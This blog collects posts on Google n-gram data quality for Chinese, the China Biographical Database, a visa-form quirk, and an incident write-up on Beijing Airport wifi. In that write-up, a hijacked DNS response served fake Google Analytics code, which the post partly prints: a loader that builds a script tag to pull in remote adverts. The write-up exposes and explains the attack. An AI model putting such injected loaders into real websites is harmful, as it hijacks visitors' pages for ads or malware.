When n-grams go bad

As a followup to Google n-grams and pre-modern Chinese, other features of the Google n-gram viewer may help shed some light on the issues with the pre-1950 data for Chinese.

One useful feature is wildcard search, which allows various open-ended searches, the simplest of these being a search for “*”, which plots the most frequent 1-grams in a corpus – i.e. the most commonly occurring words. For example, if we input a single asterisk as our search query on the English corpus, we get the frequencies of the ten most common English words:

The results look plausible at least as far back as 1800, which is what the authors claim to be the reliable part of the data. Earlier than that things get shakier, and before about 1650 things get quite seriously out of hand:

Remember, these are the most common terms in the corpus, i.e. the ones for which the data is going to be the most reliable. Now lets look at the equivalent figures for Chinese. Firstly, we can get a nice baseline showing what we would like to see by doing the equivalent search on a relatively reliable part of the data, e.g. 1970 to 2000:

This looks good. The top ten 1-grams – i.e. the most frequently occurring terms – are all commonly occurring Chinese words. Now lets try going back to 1800:

Oh dear. From 1800 to 2000, of the ten most frequent 1-grams, more than half are not terms that plausibly occur in pre-modern Chinese texts at all. Note also that the scale of the y axis has now changed: according to this graph, it would appear that up to 40% of terms in pre-1940 texts may have been detected as being URLs or other non-textual content. Unsurprisingly, these problems continue all the way back to 1500:

It’s unclear what exactly _URL_, ^_URL, and @_URL are supposed to represent as they don’t seem to be documented, and none of them are accepted by the viewer as valid query terms so we can’t easily check what their values are on the English data. Possibly they are just categorization tags that don’t affect the overall counts and thus normalized frequencies, but even so they surely point to serious problems with the data that have caused up to 50% of terms to be so interpreted.

Even aside from these suspect “URLs”, the other most frequent terms returned indicate that three terms not plausibly occurring in pre-modern Chinese texts – “0″, “1″, and “I” – account for anything up to 20% or more of all terms in the pre-1900 data:

Since all the n-gram counts are normalized by the total number of terms, these issues (presumably primarily caused by OCR errors) affect all results for Chinese in any year in which they occur. So it looks as if while 1800 might be a reasonable cut-off for meaningful interpretation of the English data, for the Chinese case 1970 would be a better choice, and any results from before around 1940 will be largely meaningless due to the overwhelming amount of noise.

Update April 18, 2015:

It appears that the @_URL_ and ^_URL_ actually correspond to the terms “@” and “^” (both, presumably, tagged with “URL”), and so these do indeed affect the results: for many years pre-1950, anything up to 60% of all terms in the corpus are the term “^”:

It seems that the data used for Chinese fails some fairly basic sanity checks (including “is it in Chinese?”).

Posted in Digital humanities | Leave a comment

Google n-grams and pre-modern Chinese

The Google n-gram viewer allows real-time searching of the frequencies of words and word sequences over time across a large corpus of texts digitized as part of the Google Books project. Without getting into the debate as to whether things like broad cultural trends can legitimately be deduced from these results, it seems clear that access to term and n-gram frequency statistics generated from a large enough corpus at least ought to be able to tell us interesting things about observed word use (though probably with important caveats about things like selection of material).

So the fact that Google’s n-gram results include data for Chinese (albeit only in simplified characters) going back as far as 1500 AD sounds very promising. The online n-gram viewer allows querying of this data, so we can immediately get some results. For example, if we keep the default search scope of 1800-2000 (the authors themselves acknowledge that data gets quite sparse before 1800 so data from earlier than that may be less meaningful), and search for a single character like “万”, we get a nice graph of its frequency over time:

This looks like a good start, although we get noticeably less smooth results from the pre-1960 part of the graph. Trying some other characters, we can get some nice results like this one that seem plausibly attributable to the shift from literary to vernacular Chinese:

Unfortunately though, further queries quickly show the limitations of the data. According to the Google n-gram data, “Mengzi”, the name both of one of the most revered Chinese philosophers of the classical period as well as the hugely important canonical text attributed to him, is first mentioned in 1927:

Confucius himself doesn’t fare much better, especially when we go back earlier than 1800 – and the Analects doesn’t even get mentioned once until the 1950s:

Ouch. So it looks like there may be some pretty serious issues with the data even after 1800, and perhaps even as late as 1950. Of course, for a variety of reasons we would expect there to be more data available for the last 50 years or so. How much data is there? Luckily this information is available online.

Looking at the numbers it quickly becomes clear that the pre-modern data is fairly sparse: the first entry is for the year 1510, and has only one volume with 2206 “matches” (i.e. total 1-grams) in the “total counts” file for one single volume of 231 pages. This compares with the first English entry for 1505, with 32059 matches for one volume of 231 pages. Apart from the total quantity of data, one worry is that the number of recorded 1-grams does not seem to fit well with the number of pages – apparently there are fewer than ten recorded 1-grams per page for this volume, which seems improbably few. Adding up the total 1-grams for each year, we get a total of 65195 1-grams by 1560, and by 1900 the figure increases to over 11 million – still less than 0.05% of the total for the whole set (over 26 billion), but definitely enough for us to reasonably expect non-zero results for common terms.

So it does seem surprising that so many results should end up being zero even in cases where Google Books does have some data. For instance, although a search for “寡人” again has no data for any pre-1950 texts, the n-gram viewer itself provides a handy link to “Search in Google Books: 1800 – 1957″, which does return a number of results. This is interesting, because the search results in Google Books also give snippets of Google’s corresponding OCR results. For instance, Google Books has “寡人” occurring on various pages of a book it describes as “馬氏繹史: 160卷年表, 第 13-24 卷”, published according to Google Books in 1897:

Given the apparent errors (although the book is surely in the public domain, no image view or download is available) this book may have been excluded because of poor OCR quality or other reasons, and/or assigned a different date (the text itself being composed earlier than the publication of this edition). (An interesting aside: the results you get for the same search within the same volume of Google Books varies with location. In this case, “寡人” within this volume gets 67 results from Hong Kong, but only 35 from the US.) The first hit looks like it might correspond to parts of this page and the following one on the Chinese Text Project (based on a different edition of the text however).

A final issue that may affect the results is that of tokenization. Since Chinese doesn’t delimit words, the texts first have to be split into words based upon their content. So not every sequence of the characters “寡” and “人” will be counted as an instance of the term “寡人”. This is likely to introduce further problems, partly because it’s a somewhat difficult problem to begin with, but also because it will become a near-impossible task when additional corruption of the source text is introduced through OCR.

In summary, it seems that the Google n-gram data may still need some work before it will be useful for pre-modern Chinese.

Followup post: When n-grams go bad

Posted in Digital humanities | Leave a comment

China Biographical Database

The China Biographical Database Project (CBDB) describes itself as “an online relational database with biographical information about approximately 328,000 individuals as of May 2014, primarily from the 7th through 19th centuries”. A joint project of Harvard’s Fairbank Center for Chinese Studies, Academia Sinica’s Institute of History and Philology, and Peking University’s Center for Research on Ancient Chinese History, the project’s relatively compact website belies an extraordinary wealth of structured data that is available for download in the form of an Access database, and can also be directly queried using an API.

The level of detail included in the database is quite astounding – and, crucially for this kind of material, the data is carefully structured such that many kinds of complex queries for specific types of information are possible.

The underlying tables that store the information can also be accessed directly to construct complex queries, or to export subsets of the data:

A simple public API is also offered that allows direct querying of the data and returns either human-readable HTML or structured data in XML or JSON. At present the only supported queries for this API appear to be names in Chinese or Pinyin and record number, which significantly limits its flexibility versus the Access database, but for applications where these queries are sufficient it provides a very neat way of accessing the data in a structured format. According to the site, at least four other projects are currently making use of the API.

Surprisingly even though the entire database is made freely available for download I found no explicit license or statement as to acceptable reuse of the data, other than the generic copyright notice at the bottom of the website, so it is unclear whether it is intended to be open source, though it is clearly open access.

Posted in Digital humanities | Leave a comment

Beijing Airport Wifi hacked: DNS attack pushes adverts to sites via Google Analytics

While at Beijing Airport recently, I connected to the official airport wifi service, and noticed something strange when visiting ctext.org:

A large floating advert had appeared at the bottom right of every page of the site, obscuring much of the content.

Could the site have been hacked? I searched the HTML source for unusual Javascript or Iframe additions, but there weren’t any – all the code included should have been legitimate. Only one inclusion was not from ctext.org: the standard Google Analytics code, which loads asynchronously from http://www.google-analytics.com/ga.js. Let’s take a look at that file when retrieved over Beijing Airport wifi:

var sign = new Error('log').stack;
var regx = /.*\/(.*?\.js.*?)/;
	var group = sign.match(regx);
		var s = group[1];
var url = "" + s;
var jsNode = document.createElement('script');
	var head = document.getElementsByTagName('head').item(0);

This code basically says something like “fetch an advert from and attach it to this webpage” – definitely not what Google Analytics ought to be doing. So why is this happening?

home:~ user$ ping www.google-analytics.com
PING www-google-analytics.l.google.com ( 56 data bytes
64 bytes from icmp_seq=0 ttl=58 time=36.207 ms
64 bytes from icmp_seq=1 ttl=58 time=38.659 ms

OK, so www.google-analytics.com is resolving to… who does that belong to?

home:~ user$ whois

# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml

# Query terms are ambiguous.  The query is assumed to be:
#     "n"
# Use "?" to get help.

# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=

NetRange: -
NetName:        APNIC-203
NetHandle:      NET-203-0-0-0-1
Parent:          ()
NetType:        Allocated to APNIC
Organization:   Asia Pacific Network Information Centre (APNIC)
RegDate:        1994-04-05
Updated:        2010-08-02
Comment:        This IP address range is not registered in the ARIN database.
Comment:        For details, refer to the APNIC Whois Database via
Comment:        WHOIS.APNIC.NET or http://wq.apnic.net/apnic-bin/whois.pl
Comment:        ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:        for the Asia Pacific region. APNIC does not operate networks
Comment:        using this IP address range and is not able to investigate
Comment:        spam or abuse reports relating to these addresses. For more
Comment:        help, refer to http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
Ref:            http://whois.arin.net/rest/net/NET-203-0-0-0-1

OrgName:        Asia Pacific Network Information Centre
OrgId:          APNIC
Address:        PO Box 3646
City:           South Brisbane
StateProv:      QLD
PostalCode:     4101
Country:        AU
Updated:        2012-01-24
Ref:            http://whois.arin.net/rest/org/APNIC

ReferralServer: whois://whois.apnic.net

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net
OrgTechRef:    http://whois.arin.net/rest/poc/AWC12-ARIN

OrgAbuseHandle: AWC12-ARIN
OrgAbuseName:   APNIC Whois Contact
OrgAbusePhone:  +61 7 3858 3188
OrgAbuseEmail:  search-apnic-not-arin@apnic.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/AWC12-ARIN

# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml

% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to ' -'

inetnum: -
netname:        GOOGLECN
descr:          Beijing Gu Xiang Information Technology Co.,Ltd.
descr:          Bldg 6, No.1 Zhongguancun East Rd, Beijing
country:        CN
admin-c:        ZM657-AP
tech-c:         ZM657-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
changed:        ipas@cnnic.cn 20110412
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.cn 20110428
source:         APNIC

person:         GOOGLECN Contact
address:        Kejian Building
address:        Tsinghua Science Park Building 6
address:        No. 1 Zhongguancun East Road
address:        Haidian District
address:        Beijing P.R. China 100084
country:        CN
phone:          +86-10-62503000
fax-no:         +86-10-62503001
e-mail:         cnnic-contact@google.com
nic-hdl:        ZM657-AP
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.net 20110426
source:         APNIC

% Information related to ''

descr:          FM SITE5
origin:         AS24424
notify:         nst@corp.ganji.com
mnt-by:         MAINT-CNNIC-AP
changed:        nst@corp.ganji.com 20060612
source:         APNIC

% This query was served by the APNIC Whois Service version 1.69.1-APNICv1r3 (WHOIS4)

Huh. That’s strange – the IP serving the fake Analytics code is actually allocated to GOOGLECN, registered to Google’s office in Beijing. What’s up with that? There’s definitely something funny going on here, presumably relating to the last part of the query response about ultimately belonging to “FM SITE5″ and perhaps being associated with ganji.com.

Anyway, it looks like what is happening is that someone is altering the DNS response for www.google-analytics.com to point to a server they control so they can display adverts on other people’s websites – in fact on any website that uses Google Analytics. For example:

It has to be said that this is a pretty good scam. After all, unless users are already familiar with the site they are visiting, they may simply assume that the adverts are legitimate ones run by the owners of these sites, while the profits go to the scammer and the site owner remains unaware that anything has happened. So who’s the scammer? Assuming this scam does not originate with someone at Google China or Beijing Airport, it seems most likely that someone’s router has been hacked, as has recently been reported elsewhere:

The scary thing about this is that the malicious code can easily be set to do all sorts of things – displaying adverts is relatively benign compared to popups appearing to come from legitimate and trusted sites that trick users into downloading malware-ridden software or direct attacks on known browser weaknesses, for instance. By compromising routers that service large numbers of users – airport wifi being an excellent example – scams taking advantage of Google Analytics code can quickly affect large numbers of people. Since from a user perspective the genuine Analytics code has no visible effect, its replacement with malicious code can be easily overlooked.

Posted in Uncategorized | Comments Off

HK Visa Online Application Status Enquiry – Invalid Reference Number

This post is a little off-topic, but perhaps will help people Googling with the same problem.

A trivial issue nearly prevented me from being able to determine the status of my Hong Kong visa application online. The reference number I’d been given was of the form XXXX-nnnn-nn – four letters, four digits, then another two digits:

When I tried submitting the code exactly as (hand-)written on my receipt, the system told me the number was invalid:

For some reason the programmer in me thought, “surely it couldn’t be that the fields have to be zero padded?” – so I tried adding zeros to the middle field until the form would allow no more. Now displaying “XXXX-000nnnn-nn”, I submitted the form, and was amazed to see that it worked! Presumably the software makes a string comparison even for the numeric fields, so the reference number must have exactly 7 digits in the middle field:

In my case it turned out that being able to check online was very useful, as nobody was answering the phone at the relevant immigration department, and once I was finally able to check online, I discovered that my application was already approved and ready to collect.

I couldn’t find any mention of this in the instructions, and it certainly wasn’t obvious from the error message (I’d assumed that my application must by of the “not supported” type) – perhaps this report will help someone else check their status (or help someone at the immigration department fix their software/error message).

Posted in Uncategorized | Leave a comment